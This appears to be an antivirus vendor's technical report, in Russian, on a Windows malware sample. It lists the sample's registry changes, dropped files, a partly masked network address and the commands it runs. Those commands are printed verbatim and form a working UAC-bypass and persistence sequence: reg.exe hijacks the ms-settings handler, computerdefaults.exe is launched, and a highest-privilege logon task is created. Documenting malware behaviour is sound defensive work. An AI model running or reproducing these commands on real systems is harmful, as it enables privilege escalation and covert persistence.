Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Classes\ms-settings\shell\open\command] '' = '%WINDIR%\Temp\winlogon_update.exe'
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\winupdatetask
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\winlogon_update.exe
Сетевая активность
TCP
Другие
- '34.##9.100.209':443
Другое
Запускает на исполнение
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "%WINDIR%\Temp\winlogon_update.exe" /f (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f (со скрытым окном)
- '<SYSTEM32>\computerdefaults.exe' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn "WinUpdateTask" /tr "%WINDIR%\Temp\winlogon_update.exe" /sc onlogon /rl highest /f (со скрытым окном)
